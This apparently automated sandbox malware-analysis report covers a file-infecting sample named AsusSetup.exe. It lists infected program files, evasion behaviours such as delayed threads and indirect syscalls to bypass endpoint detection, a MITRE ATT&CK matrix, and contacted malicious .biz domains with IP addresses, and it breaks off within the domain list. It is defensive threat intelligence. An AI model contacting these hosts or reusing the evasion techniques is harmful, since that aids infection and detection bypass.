Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Windows\System32\msdtc.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-3883
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-3727
Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-3893
Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-3883
Source: C:\Users\user\Desktop\AsusSetup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-5708
Source: C:\Users\user\Desktop\AsusSetup.exe TID: 6192Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\alg.exe TID: 1776Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\alg.exe TID: 2928Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\alg.exe TID: 1776Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\alg.exeLast function: Thread delayed
Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: AsusSetup.exe, 00000000.00000002.2471426702.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2203010728.00000000004CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWBox\o}
Source: AsusSetup.exe, 00000000.00000003.2202574488.0000000000550000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2170372630.0000000000550000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.0000000000550000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2693383096.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2903488909.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2725026412.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179107038.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2864295525.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2610742112.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2197772350.00000000005AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: AppVClient.exe, 00000007.00000003.2166301848.0000000000500000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2166984479.000000000052F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2166643153.000000000051A000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.2170606163.0000000000530000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2166366336.0000000000517000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
Source: C:\Users\user\Desktop\AsusSetup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST557F.tmp VolumeInformationJump to behavior
Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST5580.tmp VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_00000001401CB8F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00000001401CB8F4

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		2
LSASS Driver		1
Process Injection		222
Masquerading		OS Credential Dumping1
System Time Discovery		1
Taint Shared Content		1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		11
Virtualization/Sandbox Evasion		LSASS Memory11
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
LSASS Driver		1
Process Injection		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets12
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543957 Sample: AsusSetup.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 33 zyiexezl.biz 2->33 35 zrlssa.biz 2->35 37 124 other IPs or domains 2->37 51 Suricata IDS alerts for network traffic 2->51 53 Antivirus detection for dropped file 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 6 other signatures 2->57 6 alg.exe 1 2->6         started        11 AsusSetup.exe 1 2->11         started        13 FXSSVC.exe 15 4 2->13         started        15 7 other processes 2->15 signatures3 process4 dnsIp5 39 zyiexezl.biz 18.208.156.248, 49975, 50009, 50013 AMAZON-AESUS United States 6->39 41 xccjj.biz 18.246.231.120, 50012, 50022, 50034 AMAZON-02US United States 6->41 49 16 other IPs or domains 6->49 17 C:\Program Files\...\updater.exe, PE32+ 6->17 dropped 19 C:\Program Files\...\private_browsing.exe, PE32+ 6->19 dropped 21 C:\Program Files\...\plugin-container.exe, PE32+ 6->21 dropped 29 115 other malicious files 6->29 dropped 59 Creates files in the system32 config directory 6->59 61 Drops executable to a common third party application directory 6->61 63 Infects executable files (exe, dll, sys, html) 6->63 43 jifai.biz 44.221.84.105, 49709, 49711, 49941 AMAZON-AESUS United States 11->43 45 wluwplyh.biz 18.141.10.107, 49706, 49707, 49720 AMAZON-02US United States 11->45 47 cvgrf.biz 54.244.188.177, 49704, 49705, 49708 AMAZON-02US United States 11->47 23 C:\Windows\System32\msdtc.exe, PE32+ 11->23 dropped 25 C:\Windows\System32\alg.exe, PE32+ 11->25 dropped 27 C:\Windows\System32\FXSSVC.exe, PE32+ 11->27 dropped 31 6 other malicious files 11->31 dropped 65 Contains functionality to behave differently if execute on a Russian/Kazak computer 11->65 67 Found direct / indirect Syscall (likely to bypass EDR) 15->67 file6 signatures7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
AsusSetup.exe74%ReversingLabsWin64.Virus.Expiro
AsusSetup.exe100%AviraW32/Infector.Gen
AsusSetup.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
uaafd.biz
3.254.94.185
truefalse
    		unknown
    xnxvnn.biz
    		13.251.16.150
    		truefalse
      		unknown
      nlscndwp.biz
      		54.244.188.177
      		truefalse
        		unknown
        vjaxhpbji.biz
        		82.112.184.197
        		truefalse
          		unknown
          ytctnunms.biz
          		3.94.10.34
          		truefalse
            		unknown
            qncdaagct.biz
            		47.129.31.212
